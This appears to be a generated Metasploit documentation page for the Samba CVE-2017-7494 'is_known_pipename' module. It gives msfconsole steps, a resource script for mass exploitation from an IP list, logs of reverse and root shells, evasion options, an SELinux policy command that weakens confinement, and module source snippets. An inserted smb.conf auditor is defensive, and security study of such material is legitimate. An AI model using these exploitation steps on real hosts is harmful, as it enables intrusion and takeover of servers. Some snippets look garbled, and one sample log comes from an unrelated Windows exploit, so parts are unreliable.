Samba is_known_pipename() Arbitrary Module Load - Metasploit
This page contains detailed information about how to use the exploit/linux/samba/is_known_pipename metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Samba is_known_pipename() Arbitrary Module Load
Module: exploit/linux/samba/is_known_pipename
Source code: modules/exploits/linux/samba/is_known_pipename.rb
Disclosure date: 2017-03-24
Last modification time: 2021-02-17 12:33:59 +0000
Supported architecture(s): -
Supported platform(s): Linux
Target service / protocol: microsoft-ds, netbios-ssn
Target network port(s): 139, 445
List of CVEs: CVE-2017-7494
This module triggers an arbitrary shared library load vulnerability in Samba versions 3.5.0 to 4.4.14, 4.5.10, and 4.6.4. This module requires valid credentials, a writeable folder in an accessible share, and knowledge of the server-side path of the writeable folder. In some cases, anonymous access combined with common filesystem locations can be used to automatically exploit this vulnerability.
Module Ranking and Traits
Module Ranking:
- excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.
Basic Usage
Using is_known_pipename against a single host
Normally, you can use exploit/linux/samba/is_known_pipename this way:
msf > use exploit/linux/samba/is_known_pipename
msf exploit(is_known_pipename) > show targets
... a list of targets ...
msf exploit(is_known_pipename) > set TARGET target-id
msf exploit(is_known_pipename) > show options
... show and set options ...
msf exploit(is_known_pipename) > exploit
Using is_known_pipename against multiple hosts
This is a remote exploit module, which means you can also engage multiple hosts.
First, create a list of IPs you wish to exploit with this module. One IP per line.
Second, set up a background payload listener. This payload should be the same as the one your is_known_pipename will be using:
- Do:
use exploit/multi/handler
- Do:
set PAYLOAD [payload]
- Set other options required by the payload
- Do:
set EXITONSESSION false
- Do:
run -j
At this point, you should have a payload listening.
Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:
<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'
File.open(ip_list, 'rb').each_line do |ip|
  ip = ip.strip           # drop the trailing newline, skip blank lines
  next if ip.empty?
  print_status("Trying against #{ip}")
  run_single("use exploit/linux/samba/is_known_pipename")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")
  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")
  run_single("run")
end
</ruby>
Next, run the resource script in the console:
msf > resource [path-to-resource-script]
And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:
msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80
RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600
[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600
Required Options
- RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
Knowledge Base
Vulnerable Application
This module exploits Samba versions from 3.5.0 up to, but not including, the releases that fixed CVE-2017-7494 (4.4.14, 4.5.10 and 4.6.4) by loading a malicious shared library. Samba's download archives are here. There are some requirements for this exploit to be successful:
- Valid credentials
- Writeable folder in an accessible share
- Server-side path of the writeable folder
However, in some cases anonymous access with common filesystem locations can be used to automate exploitation.
A vulnerable Samba config may have a share similar to the following in smb.conf. This is a setup for 'easy' exploitation where no SMB options are required to be set:
[exploitable]
comment = CVE-2017-7494
path = /tmp
writable = yes
browseable = yes
guest ok = yes
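As an added example, not code from the module or from Samba: a small Ruby auditor that reads an smb.conf, reports the shares a guest can write to (the [exploitable] pattern above) and checks whether the workaround from the Samba advisory, nt pipe support = no in [global], is present. The sample configurations and helper names are constructed for this example, and the parser covers only the subset of smb.conf syntax needed here (whole-line comments, no include directives or variable substitution).

```ruby
# Added example (not part of the module or of Samba): audit an smb.conf for
# the two things that decide whether this module can run unauthenticated:
# a share that guests can write to, and whether the upstream workaround
# 'nt pipe support = no' is present in [global]. The sample configs and the
# helper names are constructed for this example.

TRUE_WORDS = %w[yes true 1].freeze

# smb.conf booleans accept yes/true/1 and no/false/0; unset falls back to default.
def smb_bool(value, default)
  return default if value.nil?
  TRUE_WORDS.include?(value.strip.downcase)
end

# Minimal smb.conf parser: { 'global' => { 'key' => 'value' }, 'share' => {...} }.
# Section and key names are downcased; whole-line comments (; or #) are skipped.
def parse_smb_conf(text)
  sections = { 'global' => {} }
  current = 'global'
  text.each_line do |raw|
    line = raw.strip
    next if line.empty? || line.start_with?(';', '#')
    if (m = line.match(/\A\[(.+)\]\z/))
      current = m[1].strip.downcase
      sections[current] ||= {}
    elsif line.include?('=')
      key, value = line.split('=', 2)
      sections[current][key.strip.downcase.squeeze(' ')] = value.strip
    end
  end
  sections
end

# 'writable', 'writeable' and 'write ok' are synonyms and invert 'read only',
# whose default is yes, so a share with neither set is read-only.
def share_writable?(opts)
  explicit = opts['writable'] || opts['writeable'] || opts['write ok']
  return smb_bool(explicit, false) unless explicit.nil?
  !smb_bool(opts['read only'], true)
end

# Shares an anonymous client can both reach and write to: this is the
# [exploitable] pattern from the page ('guest ok' has the alias 'public').
def guest_writable_shares(conf)
  conf.each_with_object({}) do |(name, opts), found|
    next if %w[global homes printers].include?(name)
    next unless share_writable?(opts) && smb_bool(opts['guest ok'] || opts['public'], false)
    found[name] = opts['path']
  end
end

# The workaround from the Samba advisory: disabling named pipe support in
# [global] removes the code path that loads the module.
def nt_pipe_support_disabled?(conf)
  !smb_bool(conf.fetch('global', {})['nt pipe support'], true)
end

def audit_smb_conf(text)
  conf = parse_smb_conf(text)
  {
    guest_writable: guest_writable_shares(conf),
    nt_pipe_support_disabled: nt_pipe_support_disabled?(conf)
  }
end

# Constructed samples: the share from the page plus a hardened variant.
VULNERABLE_CONF = <<~CONF
  [global]
  workgroup = WORKGROUP

  [exploitable]
  comment = CVE-2017-7494
  path = /tmp
  writable = yes
  browseable = yes
  guest ok = yes

  [private]
  path = /srv/private
  read only = no
CONF

HARDENED_CONF = <<~CONF
  [global]
  workgroup = WORKGROUP
  ; upstream workaround for CVE-2017-7494
  nt pipe support = no

  [exploitable]
  path = /tmp
  writable = yes
  guest ok = no
CONF

if __FILE__ == $PROGRAM_NAME
  [VULNERABLE_CONF, HARDENED_CONF].each do |conf|
    report = audit_smb_conf(conf)
    puts "guest-writable shares: #{report[:guest_writable].inspect}"
    puts "nt pipe support = no:  #{report[:nt_pipe_support_disabled]}"
  end
end
```

On the page's configuration the audit reports exploitable => /tmp with no workaround in place; on the hardened variant it reports no guest-writable shares and the workaround present. The Samba advisory notes that nt pipe support = no can disable functionality Windows clients expect, so it is a stopgap and a patched Samba is the real fix.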
Verified on:
- Synology DS412+ DSM 6.1.1-15101 Update 2 (Samba 4.4.9)
- Synology DS412+ DSM 6.1.1-15101 Update 3 (Samba 4.4.9)
- Synology DS1512+ DSM 6.1.1-15101 Update 2 (Samba 4.4.9)
- Synology DS1512+ DSM 6.1.1-15101 Update 3 (Samba 4.4.9)
- Synology DS2415+ DSM 6.1-15047 (Samba 4.3.11)
- Ubuntu 14.04.5 x64 (Samba 4.3.9)
- Ubuntu 15.04 (Samba 4.1.13)
- Ubuntu 16.04 (Samba 4.3.11)
- 1:4.3.11+dfsg-0ubuntu0.16.04.3 and older are vulnerable, fixed in 2:4.3.11+dfsg-0ubuntu0.16.04.7
- Fedora 24 (Samba 4.4.13)
Currently not working against:
- QNAP NAS Samba 4.4.9 on armv7l
- WD MyCloud NAS Samba 4.0.0rc5 armv7l
SELinux
Fedora (and possibly Red Hat) are not exploitable in their default installation: SELinux confines smbd to the smbd_t domain, and the denials below show it refusing execmem/execstack and the execution of the dropped library labelled smbd_tmp_t in /tmp. To make a lab target exploitable, SELinux must be adjusted to allow nmbd to use net_admin and smbd to exec the payload. The following feeds the logged AVC denials to audit2allow, builds a policy module from them and installs it; do this only on a test host, since it removes exactly the confinement that stops the exploit:
cat <<'EOF' | audit2allow -M cve-2017-7494; semodule -X 300 -i cve-2017-7494.pp
type=AVC msg=audit(1495745298.086:334): avc: denied { execstack } for pid=2365 comm="smbd" scontext=system_u:system_r:smbd_t:s0 tcontext=system_u:system_r:smbd_t:s0 tclass=process permissive=0
type=AVC msg=audit(1495717997.099:267): avc: denied { net_admin } for pid=959 comm="nmbd" capability=12 scontext=system_u:system_r:nmbd_t:s0 tcontext=system_u:system_r:nmbd_t:s0 tclass=capability permissive=0
type=AVC msg=audit(1495745002.690:308): avc: denied { execmem } for pid=1830 comm="smbd" scontext=system_u:system_r:smbd_t:s0 tcontext=system_u:system_r:smbd_t:s0 tclass=process permissive=0
type=AVC msg=audit(1495745183.319:331): avc: denied { execute } for pid=2313 comm="smbd" path="/tmp/ucFtDpZI.so" dev="tmpfs" ino=27436 scontext=system_u:system_r:smbd_t:s0 tcontext=system_u:object_r:smbd_tmp_t:s0 tclass=file permissive=0
EOF
Verification Steps
- Start msfconsole
- Do:
use exploit/linux/samba/is_known_pipename
- Do:
set rhost [ip]
- Do:
set target [target #]
- Do:
exploit
Options
SMB_SHARE_NAME
The name of the SMB share containing a writeable directory. Shares are automatically scanned for, and if this variable is non-blank, it will be preferred.
SMB_SHARE_BASE
The remote filesystem path correlating with the SMB share name. When set, this value is tried first; otherwise the following common locations are brute forced. Note that SMB_SHARE_BASE is not listed by show options or show advanced in the framework version this page was generated with, so in practice the base paths below are always tried:
- /volume1
- /volume2
- /volume3
- /shared
- /mnt
- /mnt/usb
- /media
- /mnt/media
- /var/samba
- /tmp/home/home/shared
SMB_FOLDER
The directory to use within the writeable SMB share. Writable directories are automatically scanned for, and if this variable is non-blank, it will be preferred.
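The path guessing these options describe, reconstructed as an added Ruby example (not the module's code): it builds the candidate absolute paths for a given share and folder, and classifies the NT status each probe returns the way the module does, treating STATUS_OBJECT_PATH_INVALID as "library loaded" and STATUS_OBJECT_NAME_NOT_FOUND as a wrong guess. The candidate order (base/folder/file, then base/share/folder/file, for each base) is an assumption modelled on the scenario output further down; share names, file names and the fake server are constructed.

```ruby
# Added example, not code from the module: rebuild the server-side path
# guessing the module does when SMB_SHARE_BASE is not known, and interpret
# the NT status each probe returns. The candidate order is modelled on the
# scenario output on this page and is an assumption; share names, file names
# and the fake server below are constructed.

DEFAULT_SHARE_BASES = %w[
  /volume1 /volume2 /volume3 /shared /mnt /mnt/usb /media /mnt/media
  /var/samba /tmp/home/home/shared
].freeze

# NT status values (MS-ERREF) the probe loop has to tell apart.
STATUS_OBJECT_NAME_NOT_FOUND = 0xC0000034
STATUS_OBJECT_PATH_INVALID   = 0xC0000039

# Absolute paths to try, in order. A share is commonly exported from
# <base>/<share> (ESX under /volume1, yarp under /tmp in the scenarios), but
# the share root may also be the base itself (the [exploitable] share exports
# /tmp directly), so both layouts are generated per base; SMB_SHARE_BASE,
# when given, is tried before the built-in list.
def candidate_paths(share:, folder:, payload:, share_base: nil)
  bases = [share_base, *DEFAULT_SHARE_BASES].compact.uniq
  bases.flat_map do |base|
    [
      File.join(*[base, folder, payload].reject(&:empty?)),
      File.join(*[base, share, folder, payload].reject(&:empty?))
    ]
  end.uniq
end

# Samba resolves \PIPE\<name> by loading <name> as a module when it is an
# absolute path. The module treats STATUS_OBJECT_PATH_INVALID as success:
# once the library's constructor has run, smbd has no real pipe to return.
# STATUS_OBJECT_NAME_NOT_FOUND just means the guessed path does not exist.
def classify_probe(status)
  case status
  when STATUS_OBJECT_PATH_INVALID   then :loaded
  when STATUS_OBJECT_NAME_NOT_FOUND then :not_found
  else :other
  end
end

# Walk the candidates and return the first path that loads, or nil. The block
# plays the server: it takes a path and returns the NT status of the pipe open.
def find_module_path(candidates)
  candidates.each do |path|
    return path if classify_probe(yield(path)) == :loaded
  end
  nil
end

# Constructed fake server for the Synology DS412+ scenario: the share 'ESX'
# lives at /volume1/ESX and no other guessed path exists.
def fake_synology_server(path)
  path == '/volume1/ESX/eePUbtdw.so' ? STATUS_OBJECT_PATH_INVALID : STATUS_OBJECT_NAME_NOT_FOUND
end

if __FILE__ == $PROGRAM_NAME
  paths = candidate_paths(share: 'ESX', folder: '', payload: 'eePUbtdw.so')
  hit = find_module_path(paths) { |p| fake_synology_server(p) }
  puts "probed #{paths.index(hit) + 1} paths, loaded via #{hit}"
end
```

Run against the fake server, the loop reproduces the Synology scenario below: /volume1/eePUbtdw.so fails with STATUS_OBJECT_NAME_NOT_FOUND and /volume1/ESX/eePUbtdw.so loads. A status outside these two (access denied, for example) is worth inspecting rather than skipping, since it usually means the share or pipe open itself is failing rather than the path guess.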
Scenarios
Synology DS412+ w/ INTEL Atom D2700 on DSM 6.1.1-15101 Update 2
msf exploit(is_known_pipename) > exploit
[*] Started reverse TCP handler on 1.2.3.117:4444
[*] 1.2.3.119:445 - Using location \\1.2.3.119\ESX\ for the path
[*] 1.2.3.119:445 - Payload is stored in //1.2.3.119/ESX/ as eePUbtdw.so
[*] 1.2.3.119:445 - Trying location /volume1/eePUbtdw.so...
[-] 1.2.3.119:445 - Probe: /volume1/eePUbtdw.so: The server responded with error: STATUS_OBJECT_NAME_NOT_FOUND (Command=162 WordCount=0)
[*] 1.2.3.119:445 - Trying location /volume1/ESX/eePUbtdw.so...
[*] Command shell session 1 opened (1.2.3.117:4444 -> 1.2.3.119:34366) at 2017-05-24 21:12:07 -0400
id
uid=0(root) gid=0(root) groups=0(root),100(users)
uname -a
Linux synologyNAS 3.10.102 #15101 SMP Fri May 5 12:01:38 CST 2017 x86_64 GNU/Linux synology_cedarview_412+
Ubuntu 16.04
msf exploit(is_known_pipename) > exploit
[*] Started reverse TCP handler on 192.168.0.3:4444
[*] 192.168.0.3:445 - Using location \\192.168.0.3\yarp\h for the path
[*] 192.168.0.3:445 - Payload is stored in //192.168.0.3/yarp/h as GTithXJz.so
[*] 192.168.0.3:445 - Trying location /tmp/yarp/h/GTithXJz.so...
[*] Command shell session 6 opened (192.168.0.3:4444 -> 192.168.0.3:45076) at 2017-05-24 19:41:40 -0500
id
uid=65534(nobody) gid=0(root) groups=0(root),65534(nogroup)
Msfconsole Usage
Here is how the linux/samba/is_known_pipename exploit module looks in the msfconsole:
msf6 > use exploit/linux/samba/is_known_pipename
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(linux/samba/is_known_pipename) > show info
Name: Samba is_known_pipename() Arbitrary Module Load
Module: exploit/linux/samba/is_known_pipename
Platform: Linux
Arch:
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2017-03-24
Provided by:
steelo
hdm
bcoles
Available targets:
Id Name
-- ----
0 Automatic (Interact)
1 Automatic (Command)
2 Linux x86
3 Linux x86_64
4 Linux ARM (LE)
5 Linux ARM64
6 Linux MIPS
7 Linux MIPSLE
8 Linux MIPS64
9 Linux MIPS64LE
10 Linux PPC
11 Linux PPC64
12 Linux PPC64 (LE)
13 Linux SPARC
14 Linux SPARC64
15 Linux s390x
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SMB_FOLDER no The directory to use within the writeable SMB share
SMB_SHARE_NAME no The name of the SMB share containing a writeable directory
Payload information:
Space: 9000
Description:
This module triggers an arbitrary shared library load vulnerability
in Samba versions 3.5.0 to 4.4.14, 4.5.10, and 4.6.4. This module
requires valid credentials, a writeable folder in an accessible
share, and knowledge of the server-side path of the writeable
folder. In some cases, anonymous access combined with common
filesystem locations can be used to automatically exploit this
vulnerability.
References:
https://nvd.nist.gov/vuln/detail/CVE-2017-7494
https://www.samba.org/samba/security/CVE-2017-7494.html
Module Options
This is a complete list of options available in the linux/samba/is_known_pipename exploit:
msf6 exploit(linux/samba/is_known_pipename) > show options
Module options (exploit/linux/samba/is_known_pipename):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SMB_FOLDER no The directory to use within the writeable SMB share
SMB_SHARE_NAME no The name of the SMB share containing a writeable directory
Payload options (cmd/unix/interact):
Name Current Setting Required Description
---- --------------- -------- -----------
Exploit target:
Id Name
-- ----
0 Automatic (Interact)
Advanced Options
Here is a complete list of advanced options supported by the linux/samba/is_known_pipename exploit:
msf6 exploit(linux/samba/is_known_pipename) > show advanced
Module advanced options (exploit/linux/samba/is_known_pipename):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
ConnectTimeout 10 yes Maximum number of seconds to establish a TCP connection
ContextInformationFile no The information file that contains context information
DCERPC::ReadTimeout 10 yes The number of seconds to wait for DCERPC responses
DisablePayloadHandler false no Disable the handler code for the selected payload
EnableContextEncoding false no Use transient context when encoding payloads
NTLM::SendLM true yes Always send the LANMAN response (except when NTLMv2_session is specified)
NTLM::SendNTLM true yes Activate the 'Negotiate NTLM key' flag, indicating the use of NTLM responses
NTLM::SendSPN true yes Send an avp of type SPN in the ntlmv2 client blob, this allows authentication on Windows 7+/Server 2008 R2+ when SPN is required
NTLM::UseLMKey false yes Activate the 'Negotiate Lan Manager Key' flag, using the LM key when the LM response is sent
NTLM::UseNTLM2_session true yes Activate the 'Negotiate NTLM2 key' flag, forcing the use of a NTLMv2_session
NTLM::UseNTLMv2 true yes Use NTLMv2 instead of NTLM2_session when 'Negotiate NTLM2' key is true
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
SMB::AlwaysEncrypt true yes Enforces encryption even if the server does not require it (SMB3.x only). Note that when it is set to false, the SMB client will still encrypt the communication if the server requires it
SMB::ChunkSize 500 yes The chunk size for SMB segments, bigger values will increase speed but break NT 4.0 and SMB signing
SMB::Native_LM Windows 2000 5.0 yes The Native LM to send during authentication
SMB::Native_OS Windows 2000 2195 yes The Native OS to send during authentication
SMB::ProtocolVersion 1,2,3 yes One or a list of comma-separated SMB protocol versions to negotiate (e.g. "1" or "1,2" or "2,3,1")
SMB::VerifySignature false yes Enforces client-side verification of server response signatures
SMBDirect true no The target port is a raw SMB service (not NetBIOS)
SMBDomain . no The Windows domain to use for authentication
SMBName *SMBSERVER yes The NetBIOS hostname (required for port 139 connections)
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCipher no String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
SSLVerifyMode PEER no SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
WfsDelay 2 no Additional delay in seconds to wait for a session
Payload advanced options (cmd/unix/interact):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
CreateSession true no Create a new session for every successful login
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Exploit Targets
Here is a list of targets (platforms and systems) which the linux/samba/is_known_pipename module can exploit:
msf6 exploit(linux/samba/is_known_pipename) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic (Interact)
1 Automatic (Command)
2 Linux x86
3 Linux x86_64
4 Linux ARM (LE)
5 Linux ARM64
6 Linux MIPS
7 Linux MIPSLE
8 Linux MIPS64
9 Linux MIPS64LE
10 Linux PPC
11 Linux PPC64
12 Linux PPC64 (LE)
13 Linux SPARC
14 Linux SPARC64
15 Linux s390x
Compatible Payloads
This is a list of possible payloads which can be delivered and executed on the target system using the linux/samba/is_known_pipename exploit:
msf6 exploit(linux/samba/is_known_pipename) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/cmd/unix/interact normal No Unix Command, Interact with Established Connection
Evasion Options
Here is the full list of possible evasion options supported by the linux/samba/is_known_pipename exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 exploit(linux/samba/is_known_pipename) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
DCERPC::fake_bind_multi false no Use multi-context bind calls
DCERPC::fake_bind_multi_append 0 no Set the number of UUIDs to append the target
DCERPC::fake_bind_multi_prepend 0 no Set the number of UUIDs to prepend before the target
DCERPC::max_frag_size 4096 yes Set the DCERPC packet fragmentation size
DCERPC::smb_pipeio rw no Use a different delivery method for accessing named pipes (Accepted: rw, trans)
SMB::obscure_trans_pipe_level 0 yes Obscure PIPE string in TransNamedPipe (level 0-3)
SMB::pad_data_level 0 yes Place extra padding between headers and data (level 0-3)
SMB::pad_file_level 0 yes Obscure path names used in open/create (level 0-3)
SMB::pipe_evasion false yes Enable segmented read/writes for SMB Pipes
SMB::pipe_read_max_size 1024 yes Maximum buffer size for pipe reads
SMB::pipe_read_min_size 1 yes Minimum buffer size for pipe reads
SMB::pipe_write_max_size 1024 yes Maximum buffer size for pipe writes
SMB::pipe_write_min_size 1 yes Minimum buffer size for pipe writes
TCP::max_send_size 0 no Maximum tcp segment size. (0 = disable)
TCP::send_delay 0 no Delays inserted before every send. (0 = disable)
Error Messages
This module may fail with the following error messages:
- Use Rex client (SMB1 only) to enumerate directories, since it is not compatible with RubySMB client
- Enum <SHARE>: <E>
- Write <SHARE><FILENAME>: <E>
- No suitable share and path were found, try setting SMB_SHARE_NAME and SMB_FOLDER
- No matching target
- Write <SHARE><FILENAME>: <E>
- >> Failed to load <E.ERROR_NAME>
- >> Failed to load <E.STATUS_CODE.NAME>
- Error: The interactive target is chosen (0) but PAYLOAD is not set to cmd/unix/interact
- Please set PAYLOAD to cmd/unix/interact and try this again
- Invalid payload chosen for the interactive target
- Error: A non-interactive target is chosen but PAYLOAD is set to cmd/unix/interact
- Please set a valid PAYLOAD and try this again
- Invalid payload chosen for the non-interactive target
- does not appear to be Samba: <OS> / <NATIVE_LM>
- Samba version <SAMBA_VERSION.TO_S> found, but no writeable share has been identified
Check for the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.
Use Rex client (SMB1 only) to enumerate directories, since it is not compatible with RubySMB client
Here is a relevant code snippet related to the "Use Rex client (SMB1 only) to enumerate directories, since it is not compatible with RubySMB client" error message:
122: end
123:
124: # List all top-level directories within a given share
125: def enumerate_directories(share)
126: begin
127: vprint_status('Use Rex client (SMB1 only) to enumerate directories, since it is not compatible with RubySMB client')
128: connect(versions: [1])
129: smb_login
130: self.simple.connect("\\\\#{rhost}\\#{share}")
131: stuff = self.simple.client.find_first("\\*")
132: directories = [""]
Enum <SHARE>: <E>
Here is a relevant code snippet related to the "Enum <SHARE>: <E>" error message:
137: end
138:
139: return directories
140:
141: rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e
142: vprint_error("Enum #{share}: #{e}")
143: return nil
144:
145: ensure
146: simple.disconnect("\\\\#{rhost}\\#{share}")
147: smb_connect
Write <SHARE><FILENAME>: <E>
Here is a relevant code snippet related to the "Write <SHARE><FILENAME>: <E>" error message:
162:
163: simple.delete(filename)
164: return true
165:
166: rescue ::Rex::Proto::SMB::Exceptions::ErrorCode, RubySMB::Error::RubySMBError => e
167: vprint_error("Write #{share}#(unknown): #{e}")
168: return false
169:
170: ensure
171: simple.disconnect("\\\\#{rhost}\\#{share}")
172: end
No suitable share and path were found, try setting SMB_SHARE_NAME and SMB_FOLDER
Here is a relevant code snippet related to the "No suitable share and path were found, try setting SMB_SHARE_NAME and SMB_FOLDER" error message:
215:
216: # Locate a writeable share
217: def find_writeable
218: find_writeable_share_path
219: unless @share && @path
220: print_error("No suitable share and path were found, try setting SMB_SHARE_NAME and SMB_FOLDER")
221: fail_with(Failure::NoTarget, "No matching target")
222: end
223: print_status("Using location \\\\#{rhost}\\#{@share}\\#{@path} for the path")
224: end
225:
No matching target
Here is a relevant code snippet related to the "No matching target" error message:
216: # Locate a writeable share
217: def find_writeable
218: find_writeable_share_path
219: unless @share && @path
220: print_error("No suitable share and path were found, try setting SMB_SHARE_NAME and SMB_FOLDER")
221: fail_with(Failure::NoTarget, "No matching target")
222: end
223: print_status("Using location \\\\#{rhost}\\#{@share}\\#{@path} for the path")
224: end
225:
226: # Store the wrapped payload into the writeable share
Write <SHARE><FILENAME>: <E>
Here is a relevant code snippet related to the "Write <SHARE><FILENAME>: <E>" error message:
236: wfd.close
237:
238: @payload_name = random_filename
239:
240: rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e
241: print_error("Write #{@share}#(unknown): #{e}")
242: return false
243:
244: ensure
245: simple.disconnect("\\\\#{rhost}\\#{@share}")
246: end
>> Failed to load <E.ERROR_NAME>
Here is a relevant code snippet related to the ">> Failed to load <E.ERROR_NAME>" error message:
274: # Look for STATUS_OBJECT_PATH_INVALID indicating our interact payload loaded
275: if e.error_code == 0xc0000039
276: pwn
277: return true
278: else
279: print_error(" >> Failed to load #{e.error_name}")
280: end
281: rescue RubySMB::Error::UnexpectedStatusCode, RubySMB::Error::InvalidPacket => e
282: if e.status_code == ::WindowsError::NTStatus::STATUS_OBJECT_PATH_INVALID
283: pwn
284: return true
>> Failed to load <E.STATUS_CODE.NAME>
Here is a relevant code snippet related to the ">> Failed to load <E.STATUS_CODE.NAME>" error message:
281: rescue RubySMB::Error::UnexpectedStatusCode, RubySMB::Error::InvalidPacket => e
282: if e.status_code == ::WindowsError::NTStatus::STATUS_OBJECT_PATH_INVALID
283: pwn
284: return true
285: else
286: print_error(" >> Failed to load #{e.status_code.name}")
287: end
288: end
289:
290: disconnect
291:
Error: The interactive target is chosen (0) but PAYLOAD is not set to cmd/unix/interact
Here is a relevant code snippet related to the "Error: The interactive target is chosen (0) but PAYLOAD is not set to cmd/unix/interact" error message:
372: end
373:
374: # Verify that the payload settings make sense
375: def sanity_check
376: if target['Interact'] && datastore['PAYLOAD'] != "cmd/unix/interact"
377: print_error("Error: The interactive target is chosen (0) but PAYLOAD is not set to cmd/unix/interact")
378: print_error(" Please set PAYLOAD to cmd/unix/interact and try this again")
379: print_error("")
380: fail_with(Failure::NoTarget, "Invalid payload chosen for the interactive target")
381: end
382:
Please set PAYLOAD to cmd/unix/interact and try this again
Here is a relevant code snippet related to the "Please set PAYLOAD to cmd/unix/interact and try this again" error message:
373:
374: # Verify that the payload settings make sense
375: def sanity_check
376: if target['Interact'] && datastore['PAYLOAD'] != "cmd/unix/interact"
377: print_error("Error: The interactive target is chosen (0) but PAYLOAD is not set to cmd/unix/interact")
378: print_error(" Please set PAYLOAD to cmd/unix/interact and try this again")
379: print_error("")
380: fail_with(Failure::NoTarget, "Invalid payload chosen for the interactive target")
381: end
382:
383: if ! target['Interact'] && datastore['PAYLOAD'] == "cmd/unix/interact"
Invalid payload chosen for the interactive target
Here is a relevant code snippet related to the "Invalid payload chosen for the interactive target" error message:
375: def sanity_check
376: if target['Interact'] && datastore['PAYLOAD'] != "cmd/unix/interact"
377: print_error("Error: The interactive target is chosen (0) but PAYLOAD is not set to cmd/unix/interact")
378: print_error(" Please set PAYLOAD to cmd/unix/interact and try this again")
379: print_error("")
380: fail_with(Failure::NoTarget, "Invalid payload chosen for the interactive target")
381: end
382:
383: if ! target['Interact'] && datastore['PAYLOAD'] == "cmd/unix/interact"
384: print_error("Error: A non-interactive target is chosen but PAYLOAD is set to cmd/unix/interact")
385: print_error(" Please set a valid PAYLOAD and try this again")
Error: A non-interactive target is chosen but PAYLOAD is set to cmd/unix/interact
Here is a relevant code snippet related to the "Error: A non-interactive target is chosen but PAYLOAD is set to cmd/unix/interact" error message:
379: print_error("")
380: fail_with(Failure::NoTarget, "Invalid payload chosen for the interactive target")
381: end
382:
383: if ! target['Interact'] && datastore['PAYLOAD'] == "cmd/unix/interact"
384: print_error("Error: A non-interactive target is chosen but PAYLOAD is set to cmd/unix/interact")
385: print_error(" Please set a valid PAYLOAD and try this again")
386: print_error("")
387: fail_with(Failure::NoTarget, "Invalid payload chosen for the non-interactive target")
388: end
389: end
Please set a valid PAYLOAD and try this again
Here is a relevant code snippet related to the "Please set a valid PAYLOAD and try this again" error message:
380: fail_with(Failure::NoTarget, "Invalid payload chosen for the interactive target")
381: end
382:
383: if ! target['Interact'] && datastore['PAYLOAD'] == "cmd/unix/interact"
384: print_error("Error: A non-interactive target is chosen but PAYLOAD is set to cmd/unix/interact")
385: print_error(" Please set a valid PAYLOAD and try this again")
386: print_error("")
